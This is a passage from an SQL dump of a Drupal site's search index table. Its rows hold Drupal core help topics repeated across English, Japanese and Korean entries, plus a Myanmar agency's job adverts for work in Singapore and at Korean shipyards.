(30, 'ja', 'node_search', '  以下の 下の熟 の熟練 熟練労 練労働 労働者 働者を 者をシ をシン シンガ ンガポ ガポー ポール ールで ルで緊 で緊急 緊急に 急に求 に求め 求めて めてい ていま います   以下の 下の熟 の熟練 熟練労 練労働 労働者 働者を 者をシ をシン シンガ ンガポ ガポー ポール ールで ルで緊 で緊急 緊急に 急に求 に求め 求めて めてい ていま います admin fri 7212023 1659 sun 7092023 959 以下の 下の熟 の熟練 熟練労 練労働 労働者 働者を 者をシ をシン シンガ ンガポ ガポー ポール ールで ルで緊 で緊急 緊急に 急に求 に求め 求めて めてい ていま います s パス ビザ 男性の 性のみ 職種 プロジ ロジェ ジェク ェクト オペレ ペレー レーシ ーショ ション ョンコ ンコー コーデ ーディ ディネ ィネー ネータ ーター 学士号 英語を 語を流 を流暢 流暢に 暢に話 に話す 話すこ すこと ことが とがで ができ できる きるこ ること ことが とが必 が必要 必要で 要です 装置に 置につ につい ついて いての ての良 の良い 良い知 い知識 知識と 識と理 と理解 販売 購買経 買経験 経験が 験が必 が必要 必要で 要です 管理経 理経験 経験が 験が必 が必要 必要で 要です コンピ ンピュ ピュー ュータ ーター ターを ーを使 を使っ 使った った業 た業務 記録保 録保持 データ ータ入 タ入力 ファイ ァイリ イリン リング ングな グなど があり ありま ります 機械工 械工学 工学の 学の学 の学位 学位が 位があ があれ あれば れば尚 ば尚良 尚良い 良いで いです ワーク ークパ クパー パーミ ーミッ ミット ビザ 男性の 性のみ 職種 アドミ ドミン ミンサ ンサポ サポー ポート ートア トアシ アシス シスタ スタン タント 専門学 門学位 学位保 位保持 保持者 英語を 語を流 を流暢 流暢に 暢に話 に話す 話すこ すこと ことが とがで ができ できる きるこ ること ことが とが必 が必要 必要で 要です 管理経 理経験 経験が 験が必 が必要 必要で 要です 装置に 置につ につい ついて いての ての良 の良い 良い知 い知識 知識と 識と理 と理解 販売 購買経 買経験 経験が 験が必 が必要 必要で 要です コンピ ンピュ ピュー ュータ ーター ターを ーを使 を使っ 使った った業 た業務 記録保 録保持 データ ータ入 タ入力 ファイ ァイリ イリン リング ングな グなど があり ありま ります new comet trading agency co ltd 97755566770995094749109501574209965104911 18393300018393344  ', 0),
(30, 'ko', 'help_search', ' managing and deploying configuration what is the configuration system  the configuration system provides the ability for administrators to customize the site and to move and synchronize configuration changes between development sites and the live site it does this in 2 ways providing storage for configuration providing a process in which configuration changes can be imported and exported between instances of the same site for example from dev to staging to live  what is configuration data  configuration data describes settings that define how your site behaves or is displayed for example when a site administrator updates settings using an administrative form these settings are stored as configuration data configuration data describes settings as simple as a site name and as complex as a view or image style what kinds of configuration are there  active configuration active configuration is the current working configuration of a site storage of active configuration is defined by the site and resides in the database by default simple configuration a simple configuration item is a group of settings such as the settings for a module or theme each simple configuration item has its own unique structure configuration entities configuration entities are userdefined configuration items grouped by type such as views image styles and content types each configuration entity within a type has a similar structure default configuration default configuration can be defined by a module theme or installation profile in its config install or config optional directories configuration is provided in yaml files file extension yml yaml is a humanreadable data serialization standard that is used by the core software for several purposes once the default configuration has been imported into the site s active configuration through installing the extension that configuration is owned by the site not the extension this means that future updates of the extension will not override the site s active configuration for that extension what is configuration synchronization  configuration synchronization is the process of exporting and importing configuration to keep configuration synchronized between different versions of a site for example between a development site and the live site each site has unique identifier also called a uuid  which identifies the site to the system in any instance of the site as long as the site instances have been reproduced as clones cloning is when the codebase and database are copied to create a new site instance when site instances are cloned a dev instance of the site has the same uuid as the live instance when site instances share the same uuid configuration can be exported from one instance to another the following list contains terms and concepts related to configuration synchronization exported configuration when configuration is exported the active configuration is exported as a set of files in yaml format when using the configuration synchronization administrative ui configuration can be exported as a fullexport or singleitem archive this archive can then be imported into the destination site instance imported configuration imported configuration is configuration that has been exported from another instance of the site the source and is now being imported into another site instance the destination thereby updating its active configuration to match the imported configuration data set configuration sync directory the configuration sync directory location is set in the site s settingsphp file when configuration is exported the active configuration is exported and described in yaml files which are stored in the configuration sync directory after the first export the system compares the site s active configuration with the configuration data in the sync directory and will only export active configuration items that are different than their counterparts in the sync directory managing configuration overview configuration management tasks such as exporting or importing configuration and synchronizing configuration can be done either through the administrative ui provided by the core configuration manager module or a commandline interface cli tool defining a configuration sync directory path other than the default value requires read write access to the site s settingsphp file most modules and themes also provide settings forms for updating the configuration they provide see the related topics listed below for specific tasks additional resources configuration management workflow using drush concept types of data drupal user guide  concept development sites drupal user guide  making a development site drupal user guide  ', 1787923659),
(30, 'ko', 'node_search', '  긴급하 급하게 다음과 같은 숙련 노동자 동자들 자들이 싱가포 가포르 포르에 르에서 일할 필요가 있습니 습니다   긴급하 급하게 다음과 같은 숙련 노동자 동자들 자들이 싱가포 가포르 포르에 르에서 일할 필요가 있습니 습니다 admin fri 7212023 1701 sun 7092023 959 긴급하 급하게 다음과 같은 숙련 노동자 동자들 자들이 싱가포 가포르 포르에 르에서 일할 필요가 있습니 습니다 s 패스 비자 남성 전용 직책 프로젝 로젝트 운영 조정자 학사 학위 영어를 잘 구사할 수 있어야 합니다 장비 및 영업 구매 경험에 대한 좋은 지식과 이해가 필요합 요합니 합니다 행정 업무 경험이 있어야 합니다 컴퓨터 활용 기록 보관 자료 입력 파일 정리 등 기계공 계공학 학사 학위가 있다면 더욱 편리합 리합니 합니다 워크 퍼밋 비자 남성 전용 직책 행정 지원 조수 전문대 문대학 졸업 영어를 잘 구사할 수 있어야 합니다 행정 업무 경험이 있어야 합니다 장비 및 영업 구매 경험에 대한 좋은 지식과 이해가 필요합 요합니 합니다 컴퓨터 활용 기록 보관 자료 입력 파일 정리 등 new comet trading agency co ltd 9775556677 9950947491 95015742 9965104911 18393300 18393344  ', 0),
(31, 'en', 'node_search', ' we are looking for professional welders who wants to work at korean shipyards we are looking for professional welders who wants to work at korean shipyards admin wed 7262023 1254 fri 7212023 955 we are looking for professional welders who wants to work at korean shipyards 1 3rd batch of welding training course sinmalike will be opened on 1582023 at sinmalike shipyard 2 korean language course will cost 150000 mmkyats for 2 months 3 hose who do not know how to weld and those who have a basic level can attend the course by paying a course fee of 12500000 6 week course from monday to friday south korea if experts from the shipyard come to inspect interview fee xray test fees and test center fees must be paid 4 3g fcaw backing subject to change must be x ray passed for welder interview 5 basic salary w 2462000 approximate the basic salary may vary from company to company note after 3 hours of overtime per day and 22 days the money that will be earned and other living expenses health and income tax costs are deducted the remaining amount will be over 500000 burmese money 6 you can go to korea if only you pass the drug test b virus c virus tb venereal disease hiv 7 must be between 20 and 45 years old 8 must go to korea with e73 visa 9must work for at least 2 years 10 from a korean shipyard upon completion of training and proficiency welding professionals can enter the exam after passing the exam you will have the opportunity to go to work in korea contact about korea 9775556677 95015742 9950947491 18393300 18393344 18393393 a 32 chapter 201 burmese luxury housing mingal taung nyunt township yangon please contact between 900 am and 500 pm  ', 0),
(31, 'ja', 'help_search', ' managing content structure what types of data does a site have  there are four main types of data content is the information text images etc meant to be displayed to website visitors configuration is data that defines how the content is displayed some configuration such as field labels may also be visible to site visitors state is temporary data about the state of your site such as the last time the system cron jobs ran session is a subset of state information related to users interactions with the site such as site cookies and whether or not they are logged in what is a content entity  a content entity  or more commonly  entity  is an item of content data which can consist of text html markup images attached files and other data content entities are grouped into entity types  which have different purposes and are displayed in very different ways on the site most entity types are also divided into entity subtypes  which are divisions within an entity type to allow for smaller variations in how the entities are used and displayed for example the content item entity type that stores pagelevel content is divided into content type subtypes the content block entity type has block types  but the user entity type for user profile information does not have subtypes what is a field  within entity items the data is stored in individual fields  each of which holds one type of data such as formatted or plain text images or other files or dates fields can be added by an administrator on entity subtypes so that all entity items of a given entity subtype have the same collection of fields available and they can be singlevalued or multiplevalued when you create or edit entity items you are specifying the values for the fields on the entity item what is a reference field  a reference field is a field that stores a relationship between an entity and one or more other entities which may belong to the same or different entity type for example a content reference field on a content type stores a relationship between one content item and one or more other content items what field types are available  the following field types are provided by the core system and core modules many more are provided by contributed modules boolean number provided by the core system stores true false values and numbers comment provided by the core comment module allows users to add comments to an entity date timestamp datetime module stores dates and times date range datetime range module stores time date periods with a start and an end email core system stores email addresses link link module stores urls and link text list options module stores values chosen from predefined lists where the values can be numbers or text see section below for more on list fields reference core system stores entity references see section above telephone telephone module stores telephone numbers text text module stores formatted and unformatted text see section below for more on text fields what settings are available for list field types  list fields associate predefined keys  or value codes with labels that the user sees for example you might define a list field that shows the user the names of several locations while behind the scenes a location code is stored in the database each list field type corresponds to one type of stored key for example a list integer  field stores integers while the list text  field stores text strings once you have chosen the field type the main setting for a list field is the allowed values list which associates the keys with the labels what types of text fields are available  there are several types of text fields with different characteristics text fields can be either plain or formatted  plain text fields do not contain html while formatted fields can contain html and are processed through text filters  these are provided by the core filter module if you have that module enabled see the related topic below on filters for more information text fields can also be regularlength with a limit of 255 characters or long  with a very large character limit and long formatted text fields can include a summary attribute all possible combinations of these characteristics exist as text field types for example  text plain  and text formatted long with summary  are two examples of text field types what is a formatter  a formatter is a way to display a field most field types offer several types of formatters and most formatters have settings that further define how the field is displayed it is also possible to completely hide a field from display and you have the option of showing or hiding the field s label when it is displayed what is a widget  a widget is a way to edit a field some field types such as plain text singleline fields have only one widget available in this case a singleline text input field other field types offer choices for the widget for example singlevalued list fields can use a select or radio button widget for editing many widget types have settings that further define how the field can be edited managing content structure overview besides the field modules listed in the previous section there are additional core modules that you can use to manage your content structure the core node comment content block custom menu links user file image media taxonomy and contact modules all provide content entity types the core field ui module provides a user interface for managing fields and their display on entities the core layout builder module provides a more flexible user interface for configuring the display of entities the core filter responsive image and path modules provide settings and display options for entities and fields depending on the core and contributed modules that you currently have installed on your site the related topics below and other topics listed on the main help page see help will help you with tasks related to content structure additional resources concept types of data drupal user guide  planning your site drupal user guide  concept reference fields drupal user guide  ', 1787923659);
INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
(32, 'en', 'help_search', ' running and configuring cron goal configure your system so that cron will run automatically what are cron tasks  to ensure that your site and its modules continue to function well a group of administrative operations should be run periodically these operations are called cron tasks and running the tasks is known as running cron  depending on how often content is updated on your site you might need to run cron on a schedule ranging from hourly to weekly to keep your site running well what options are available for running cron  if the core automated cron module is installed your site will run cron periodically on a schedule you can configure you can set up a task on your web server to visit the cron url  which is unique to your site on a schedule you can also run cron manually but this is not the recommended way to make sure it is run periodically steps in the manage administration menu navigate to configuration   system   cron  note the last run time on the page if you want to run cron right now click run cron and wait for cron to finish if you have a way to configure tasks on your web server copy the link where it says to run cron from outside the site go to  set up a task to visit that url on your desired cron schedule such as once an hour or once a week on linuxlike servers you can use the wget command to visit a url if you configure an outside task you should uninstall the automated cron module if you are not configuring an outside task and you have the core automated cron module installed select a schedule for automated cron runs in cron settings   run cron every  click save configuration  additional resources concept cron drupal user guide  configuring cron maintenance tasks drupal user guide  ', 1787923659),
(32, 'ja', 'help_search', ' running and configuring cron goal configure your system so that cron will run automatically what are cron tasks  to ensure that your site and its modules continue to function well a group of administrative operations should be run periodically these operations are called cron tasks and running the tasks is known as running cron  depending on how often content is updated on your site you might need to run cron on a schedule ranging from hourly to weekly to keep your site running well what options are available for running cron  if the core automated cron module is installed your site will run cron periodically on a schedule you can configure you can set up a task on your web server to visit the cron url  which is unique to your site on a schedule you can also run cron manually but this is not the recommended way to make sure it is run periodically steps in the manage administration menu navigate to configuration   system   cron  note the last run time on the page if you want to run cron right now click run cron and wait for cron to finish if you have a way to configure tasks on your web server copy the link where it says to run cron from outside the site go to  set up a task to visit that url on your desired cron schedule such as once an hour or once a week on linuxlike servers you can use the wget command to visit a url if you configure an outside task you should uninstall the automated cron module if you are not configuring an outside task and you have the core automated cron module installed select a schedule for automated cron runs in cron settings   run cron every  click save configuration  additional resources concept cron drupal user guide  configuring cron maintenance tasks drupal user guide  ', 1787923659),
(32, 'ko', 'help_search', ' running and configuring cron goal configure your system so that cron will run automatically what are cron tasks  to ensure that your site and its modules continue to function well a group of administrative operations should be run periodically these operations are called cron tasks and running the tasks is known as running cron  depending on how often content is updated on your site you might need to run cron on a schedule ranging from hourly to weekly to keep your site running well what options are available for running cron  if the core automated cron module is installed your site will run cron periodically on a schedule you can configure you can set up a task on your web server to visit the cron url  which is unique to your site on a schedule you can also run cron manually but this is not the recommended way to make sure it is run periodically steps in the manage administration menu navigate to configuration   system   cron  note the last run time on the page if you want to run cron right now click run cron and wait for cron to finish if you have a way to configure tasks on your web server copy the link where it says to run cron from outside the site go to  set up a task to visit that url on your desired cron schedule such as once an hour or once a week on linuxlike servers you can use the wget command to visit a url if you configure an outside task you should uninstall the automated cron module if you are not configuring an outside task and you have the core automated cron module installed select a schedule for automated cron runs in cron settings   run cron every  click save configuration  additional resources concept cron drupal user guide  configuring cron maintenance tasks drupal user guide  ', 1787923659),
(33, 'en', 'help_search', ' extending and modifying your site functionality what is a module  a module is a set of php javascript and or css files that extends site features and adds functionality a set of core modules is distributed as part of the core software download additional contributed modules can be downloaded separately from the download extend page on drupalorg  what is an experimental module  an experimental module is a module that is still in development and is not yet stable using experimental modules on production sites is not recommended what are installing and uninstalling  installing a core or downloaded contributed module means turning it on so that you can use its features and functionality uninstalling means turning it off and removing all of its configuration a module cannot be uninstalled if another installed module depends on it or if you have created content on your site using the module you would need to delete the content and uninstall dependent modules first extending overview see the related topics listed below for help performing tasks related to extending the functionality of your site additional resources concept modules drupal user guide  extending and customizing your site drupal user guide  ', 1787923659),
(33, 'ja', 'help_search', ' extending and modifying your site functionality what is a module  a module is a set of php javascript and or css files that extends site features and adds functionality a set of core modules is distributed as part of the core software download additional contributed modules can be downloaded separately from the download extend page on drupalorg  what is an experimental module  an experimental module is a module that is still in development and is not yet stable using experimental modules on production sites is not recommended what are installing and uninstalling  installing a core or downloaded contributed module means turning it on so that you can use its features and functionality uninstalling means turning it off and removing all of its configuration a module cannot be uninstalled if another installed module depends on it or if you have created content on your site using the module you would need to delete the content and uninstall dependent modules first extending overview see the related topics listed below for help performing tasks related to extending the functionality of your site additional resources concept modules drupal user guide  extending and customizing your site drupal user guide  ', 1787923659),
(33, 'ko', 'help_search', ' extending and modifying your site functionality what is a module  a module is a set of php javascript and or css files that extends site features and adds functionality a set of core modules is distributed as part of the core software download additional contributed modules can be downloaded separately from the download extend page on drupalorg  what is an experimental module  an experimental module is a module that is still in development and is not yet stable using experimental modules on production sites is not recommended what are installing and uninstalling  installing a core or downloaded contributed module means turning it on so that you can use its features and functionality uninstalling means turning it off and removing all of its configuration a module cannot be uninstalled if another installed module depends on it or if you have created content on your site using the module you would need to delete the content and uninstall dependent modules first extending overview see the related topics listed below for help performing tasks related to extending the functionality of your site additional resources concept modules drupal user guide  extending and customizing your site drupal user guide  ', 1787923659),
(34, 'en', 'help_search', ' maintaining and troubleshooting your site maintaining and troubleshooting overview here are some tasks and hints related to maintaining your site and troubleshooting problems that may come up on your site see the related topics below for more information when performing maintenance such as installing uninstalling or updating a module put your site in maintenance mode configure your site so that cron runs periodically if your site is not behaving as expected clear the cache before trying to diagnose the problem there are several site reports that can help you diagnose problems with your site there are also two core modules that can be used for error logging database logging and syslog additional resources preventing and fixing problems drupal user guide  security and maintenance drupal user guide  ', 1787923659),
(34, 'ja', 'help_search', ' maintaining and troubleshooting your site maintaining and troubleshooting overview here are some tasks and hints related to maintaining your site and troubleshooting problems that may come up on your site see the related topics below for more information when performing maintenance such as installing uninstalling or updating a module put your site in maintenance mode configure your site so that cron runs periodically if your site is not behaving as expected clear the cache before trying to diagnose the problem there are several site reports that can help you diagnose problems with your site there are also two core modules that can be used for error logging database logging and syslog additional resources preventing and fixing problems drupal user guide  security and maintenance drupal user guide  ', 1787923659),
(34, 'ko', 'help_search', ' maintaining and troubleshooting your site maintaining and troubleshooting overview here are some tasks and hints related to maintaining your site and troubleshooting problems that may come up on your site see the related topics below for more information when performing maintenance such as installing uninstalling or updating a module put your site in maintenance mode configure your site so that cron runs periodically if your site is not behaving as expected clear the cache before trying to diagnose the problem there are several site reports that can help you diagnose problems with your site there are also two core modules that can be used for error logging database logging and syslog additional resources preventing and fixing problems drupal user guide  security and maintenance drupal user guide  ', 1787923659),
(35, 'en', 'help_search', ' managing media what are media items  core media items include audio images documents and videos you can add other media types such as social media posts through the use of contributed modules media items may be files located in your site s file system or remote items referenced by a url media items are content entities and they are divided into media types which are entity subtypes media types can have fields see managing content structure for more information on content entities and fields what is the media library  the media library is a visual user interface for managing and reusing media items add media items to content using media reference fields and the media library field widget what is an image style  an image style is a set of processing steps known as effects  that can be applied to images examples of effects include scaling and cropping images to different sizes responsive image styles can associate image styles with your theme s size breakpoints this allows serving images sized for the browser width overview of managing media the following modules provide mediarelated functionality media items and media types are managed by the core media module the core media module provides a media reference field to add media to content entities the core file and image modules also provide reference fields it is recommended to use the media reference field because it is more versatile the core media library module provides the media library and the media library field widget with this module installed the media library field widget becomes the default widget for editing media reference fields the core image module provides a user interface for defining image styles the core responsive image module provides responsive image styles using the core breakpoint module and a breakpointenabled theme these responsive styles can serve images sized for the browser see the related topics listed below for specific tasks additional resources media module ', 1787923659),
(35, 'ja', 'help_search', ' managing media what are media items  core media items include audio images documents and videos you can add other media types such as social media posts through the use of contributed modules media items may be files located in your site s file system or remote items referenced by a url media items are content entities and they are divided into media types which are entity subtypes media types can have fields see managing content structure for more information on content entities and fields what is the media library  the media library is a visual user interface for managing and reusing media items add media items to content using media reference fields and the media library field widget what is an image style  an image style is a set of processing steps known as effects  that can be applied to images examples of effects include scaling and cropping images to different sizes responsive image styles can associate image styles with your theme s size breakpoints this allows serving images sized for the browser width overview of managing media the following modules provide mediarelated functionality media items and media types are managed by the core media module the core media module provides a media reference field to add media to content entities the core file and image modules also provide reference fields it is recommended to use the media reference field because it is more versatile the core media library module provides the media library and the media library field widget with this module installed the media library field widget becomes the default widget for editing media reference fields the core image module provides a user interface for defining image styles the core responsive image module provides responsive image styles using the core breakpoint module and a breakpointenabled theme these responsive styles can serve images sized for the browser see the related topics listed below for specific tasks additional resources media module ', 1787923659),
(35, 'ko', 'help_search', ' managing media what are media items  core media items include audio images documents and videos you can add other media types such as social media posts through the use of contributed modules media items may be files located in your site s file system or remote items referenced by a url media items are content entities and they are divided into media types which are entity subtypes media types can have fields see managing content structure for more information on content entities and fields what is the media library  the media library is a visual user interface for managing and reusing media items add media items to content using media reference fields and the media library field widget what is an image style  an image style is a set of processing steps known as effects  that can be applied to images examples of effects include scaling and cropping images to different sizes responsive image styles can associate image styles with your theme s size breakpoints this allows serving images sized for the browser width overview of managing media the following modules provide mediarelated functionality media items and media types are managed by the core media module the core media module provides a media reference field to add media to content entities the core file and image modules also provide reference fields it is recommended to use the media reference field because it is more versatile the core media library module provides the media library and the media library field widget with this module installed the media library field widget becomes the default widget for editing media reference fields the core image module provides a user interface for defining image styles the core responsive image module provides responsive image styles using the core breakpoint module and a breakpointenabled theme these responsive styles can serve images sized for the browser see the related topics listed below for specific tasks additional resources media module ', 1787923659),
(36, 'en', 'help_search', ' managing menus what is a menu  a menu is a collection of menu links used to navigate a web site menus and menu links can be provided by modules or site administrators managing menus overview the core menu ui module provides a user interface for managing menus including creating new menus reordering menu links and disabling links provided by modules it also provides the ability for links to content items to be added to menus while editing if configured on the content type the core custom menu links module provides the ability to add custom links to menus each menu can be displayed by placing a block in a theme region some themes also can display a menu outside of the block system see the related topics listed below for specific tasks additional resources concept menu drupal user guide  ', 1787923659),
(36, 'ja', 'help_search', ' managing menus what is a menu  a menu is a collection of menu links used to navigate a web site menus and menu links can be provided by modules or site administrators managing menus overview the core menu ui module provides a user interface for managing menus including creating new menus reordering menu links and disabling links provided by modules it also provides the ability for links to content items to be added to menus while editing if configured on the content type the core custom menu links module provides the ability to add custom links to menus each menu can be displayed by placing a block in a theme region some themes also can display a menu outside of the block system see the related topics listed below for specific tasks additional resources concept menu drupal user guide  ', 1787923659),
(36, 'ko', 'help_search', ' managing menus what is a menu  a menu is a collection of menu links used to navigate a web site menus and menu links can be provided by modules or site administrators managing menus overview the core menu ui module provides a user interface for managing menus including creating new menus reordering menu links and disabling links provided by modules it also provides the ability for links to content items to be added to menus while editing if configured on the content type the core custom menu links module provides the ability to add custom links to menus each menu can be displayed by placing a block in a theme region some themes also can display a menu outside of the block system see the related topics listed below for specific tasks additional resources concept menu drupal user guide  ', 1787923659),
(37, 'en', 'help_search', ' optimizing site performance what is site performance  site performance in this context refers to speed factors such as the page load time and the response time after a user action on a page what is caching  caching is saving alreadyrendered html output and other calculated data for later use the first time it is needed this saves time because the next time the same data is needed it can be quickly retrieved instead of recalculated automatic caching systems also include mechanisms to delete cached calculations or mark them as no longer valid when the underlying data changes to facilitate that cached data has a lifetime  which is the maximum time before the data will be deleted from the cache forcing recalculation  what is file aggregation  aggregation is when css and javascript files are merged together and compressed into a format that is much smaller than the original this allows for faster transmission and faster rendering on the other end what can i do to improve my site s performance  the following core software modules and mechanisms can improve your site s performance internal page cache module caches pages requested by users who are not logged in anonymous users do not use if your site needs to send different output to different anonymous users internal dynamic page cache module caches data for both authenticated and anonymous users with noncacheable data in the page converted to placeholders and calculated when the page is requested big pipe module changes the way pages are sent to users so that cacheable parts are sent out first with placeholders and the uncacheable or personalized parts of the page are streamed afterwards this allows the browser to render the bulk of the page quickly and fill in the details later performance page settings in the manage administrative menu if you navigate to configuration   development   performance  you will find a setting for the maximum cache lifetime as well as the ability to turn on css and javascript file aggregation additional resources online documentation for the internal page cache module online documentation for the internal dynamic page cache module online documentation for the bigpipe module ', 1787923659),
(37, 'ja', 'help_search', ' optimizing site performance what is site performance  site performance in this context refers to speed factors such as the page load time and the response time after a user action on a page what is caching  caching is saving alreadyrendered html output and other calculated data for later use the first time it is needed this saves time because the next time the same data is needed it can be quickly retrieved instead of recalculated automatic caching systems also include mechanisms to delete cached calculations or mark them as no longer valid when the underlying data changes to facilitate that cached data has a lifetime  which is the maximum time before the data will be deleted from the cache forcing recalculation  what is file aggregation  aggregation is when css and javascript files are merged together and compressed into a format that is much smaller than the original this allows for faster transmission and faster rendering on the other end what can i do to improve my site s performance  the following core software modules and mechanisms can improve your site s performance internal page cache module caches pages requested by users who are not logged in anonymous users do not use if your site needs to send different output to different anonymous users internal dynamic page cache module caches data for both authenticated and anonymous users with noncacheable data in the page converted to placeholders and calculated when the page is requested big pipe module changes the way pages are sent to users so that cacheable parts are sent out first with placeholders and the uncacheable or personalized parts of the page are streamed afterwards this allows the browser to render the bulk of the page quickly and fill in the details later performance page settings in the manage administrative menu if you navigate to configuration   development   performance  you will find a setting for the maximum cache lifetime as well as the ability to turn on css and javascript file aggregation additional resources online documentation for the internal page cache module online documentation for the internal dynamic page cache module online documentation for the bigpipe module ', 1787923659),
(37, 'ko', 'help_search', ' optimizing site performance what is site performance  site performance in this context refers to speed factors such as the page load time and the response time after a user action on a page what is caching  caching is saving alreadyrendered html output and other calculated data for later use the first time it is needed this saves time because the next time the same data is needed it can be quickly retrieved instead of recalculated automatic caching systems also include mechanisms to delete cached calculations or mark them as no longer valid when the underlying data changes to facilitate that cached data has a lifetime  which is the maximum time before the data will be deleted from the cache forcing recalculation  what is file aggregation  aggregation is when css and javascript files are merged together and compressed into a format that is much smaller than the original this allows for faster transmission and faster rendering on the other end what can i do to improve my site s performance  the following core software modules and mechanisms can improve your site s performance internal page cache module caches pages requested by users who are not logged in anonymous users do not use if your site needs to send different output to different anonymous users internal dynamic page cache module caches data for both authenticated and anonymous users with noncacheable data in the page converted to placeholders and calculated when the page is requested big pipe module changes the way pages are sent to users so that cacheable parts are sent out first with placeholders and the uncacheable or personalized parts of the page are streamed afterwards this allows the browser to render the bulk of the page quickly and fill in the details later performance page settings in the manage administrative menu if you navigate to configuration   development   performance  you will find a setting for the maximum cache lifetime as well as the ability to turn on css and javascript file aggregation additional resources online documentation for the internal page cache module online documentation for the internal dynamic page cache module online documentation for the bigpipe module ', 1787923659),
(38, 'en', 'help_search', ' making your site secure what are security updates  any software occasionally has bugs and sometimes these bugs have security implications when security bugs are fixed in the core software modules or themes that your site uses they are released in a security update  you will need to apply security updates in order to keep your site secure what are security advisories  a security advisory is a public announcement about a reported security problem in the core software contributed projects with a shield icon and stable releases for this project are covered by the security advisory policy on their project page are also covered by drupal s security advisory policy security advisories are managed by the drupal security team  security tasks keeping track of updates updating the core software and updating contributed modules and or themes are all part of keeping your site secure see the related topics listed below for specific tasks additional resources security and maintenance drupal user guide  security advisory process and permissions policy ', 1787923659),
(38, 'ja', 'help_search', ' making your site secure what are security updates  any software occasionally has bugs and sometimes these bugs have security implications when security bugs are fixed in the core software modules or themes that your site uses they are released in a security update  you will need to apply security updates in order to keep your site secure what are security advisories  a security advisory is a public announcement about a reported security problem in the core software contributed projects with a shield icon and stable releases for this project are covered by the security advisory policy on their project page are also covered by drupal s security advisory policy security advisories are managed by the drupal security team  security tasks keeping track of updates updating the core software and updating contributed modules and or themes are all part of keeping your site secure see the related topics listed below for specific tasks additional resources security and maintenance drupal user guide  security advisory process and permissions policy ', 1787923659),
(38, 'ko', 'help_search', ' making your site secure what are security updates  any software occasionally has bugs and sometimes these bugs have security implications when security bugs are fixed in the core software modules or themes that your site uses they are released in a security update  you will need to apply security updates in order to keep your site secure what are security advisories  a security advisory is a public announcement about a reported security problem in the core software contributed projects with a shield icon and stable releases for this project are covered by the security advisory policy on their project page are also covered by drupal s security advisory policy security advisories are managed by the drupal security team  security tasks keeping track of updates updating the core software and updating contributed modules and or themes are all part of keeping your site secure see the related topics listed below for specific tasks additional resources security and maintenance drupal user guide  security advisory process and permissions policy ', 1787923659),
(39, 'en', 'help_search', ' using inline quick settings editing goal edit settings in place what is quick editing  the core settings tray module provides the ability to quickly edit settings inline it requires the core contextual links module in order to expose the links that let you edit in place who can edit settings in place  in order to follow these steps to edit settings in place the core settings tray module must be installed also either the core toolbar module or a contributed replacement must be installed you will need to have use contextual links permission as well as permission to edit the particular content or settings steps find and visit a page on your site that has the settings that you would like to edit click the contextual links edit button on the toolbar in most themes it looks like a pencil contextual edit links with the same icon will appear all over your page find the contextual link for the part of the page you want to edit for example if you want to edit the settings for a block the link should be in the topright corner of the block or topleft for righttoleft languages click the link to open the contextual links menu and click quick edit  an editing form for the settings should appear on the page make your edits and submit the form  ', 1787923659),
(39, 'ja', 'help_search', ' using inline quick settings editing goal edit settings in place what is quick editing  the core settings tray module provides the ability to quickly edit settings inline it requires the core contextual links module in order to expose the links that let you edit in place who can edit settings in place  in order to follow these steps to edit settings in place the core settings tray module must be installed also either the core toolbar module or a contributed replacement must be installed you will need to have use contextual links permission as well as permission to edit the particular content or settings steps find and visit a page on your site that has the settings that you would like to edit click the contextual links edit button on the toolbar in most themes it looks like a pencil contextual edit links with the same icon will appear all over your page find the contextual link for the part of the page you want to edit for example if you want to edit the settings for a block the link should be in the topright corner of the block or topleft for righttoleft languages click the link to open the contextual links menu and click quick edit  an editing form for the settings should appear on the page make your edits and submit the form  ', 1787923659),
(39, 'ko', 'help_search', ' using inline quick settings editing goal edit settings in place what is quick editing  the core settings tray module provides the ability to quickly edit settings inline it requires the core contextual links module in order to expose the links that let you edit in place who can edit settings in place  in order to follow these steps to edit settings in place the core settings tray module must be installed also either the core toolbar module or a contributed replacement must be installed you will need to have use contextual links permission as well as permission to edit the particular content or settings steps find and visit a page on your site that has the settings that you would like to edit click the contextual links edit button on the toolbar in most themes it looks like a pencil contextual edit links with the same icon will appear all over your page find the contextual link for the part of the page you want to edit for example if you want to edit the settings for a block the link should be in the topright corner of the block or topleft for righttoleft languages click the link to open the contextual links menu and click quick edit  an editing form for the settings should appear on the page make your edits and submit the form  ', 1787923659),
(40, 'en', 'help_search', ' tracking the content of your website tracking overview the core history module tracks how recently users have viewed content items and provides a views field and filter that can be used to show users content that they haven t yet seen if you have one or more tracking modules installed on your site see the related topics listed below for specific tasks  ', 1787923659),
(40, 'ja', 'help_search', ' tracking the content of your website tracking overview the core history module tracks how recently users have viewed content items and provides a views field and filter that can be used to show users content that they haven t yet seen if you have one or more tracking modules installed on your site see the related topics listed below for specific tasks  ', 1787923659),
(40, 'ko', 'help_search', ' tracking the content of your website tracking overview the core history module tracks how recently users have viewed content items and provides a views field and filter that can be used to show users content that they haven t yet seen if you have one or more tracking modules installed on your site see the related topics listed below for specific tasks  ', 1787923659),
(41, 'en', 'help_search', ' working with languages and translations what text can be translated in your site  there are three types of text that can be translated content blocks content items etc can be written in english or another language and can be translated into additional languages see managing content structure to learn more about content many configuration items also include text that can be translated default configuration provided by your site s software is provided in english you can also download communityprovided translations see managing and deploying configuration to learn more about configuration user interface text that is provided by the core software your install profile themes and modules is provided in english but can be translated into other languages you can also download translations that communitymembers have provided working with languages overview the core language module lets you add new languages to your site provides the language switcher block and provides the ability to configure block visibility by language the block and block visibility settings are only available if you have multiple languages configured the core content translation configuration translation and interface translation modules let you translate content configuration and the builtin user interface respectively the core update manager module manages automatic downloads of communityprovided translations of default configuration and userinterface text see the related topics listed below for specific tasks  ', 1787923659),
(41, 'ja', 'help_search', ' working with languages and translations what text can be translated in your site  there are three types of text that can be translated content blocks content items etc can be written in english or another language and can be translated into additional languages see managing content structure to learn more about content many configuration items also include text that can be translated default configuration provided by your site s software is provided in english you can also download communityprovided translations see managing and deploying configuration to learn more about configuration user interface text that is provided by the core software your install profile themes and modules is provided in english but can be translated into other languages you can also download translations that communitymembers have provided working with languages overview the core language module lets you add new languages to your site provides the language switcher block and provides the ability to configure block visibility by language the block and block visibility settings are only available if you have multiple languages configured the core content translation configuration translation and interface translation modules let you translate content configuration and the builtin user interface respectively the core update manager module manages automatic downloads of communityprovided translations of default configuration and userinterface text see the related topics listed below for specific tasks  ', 1787923659),
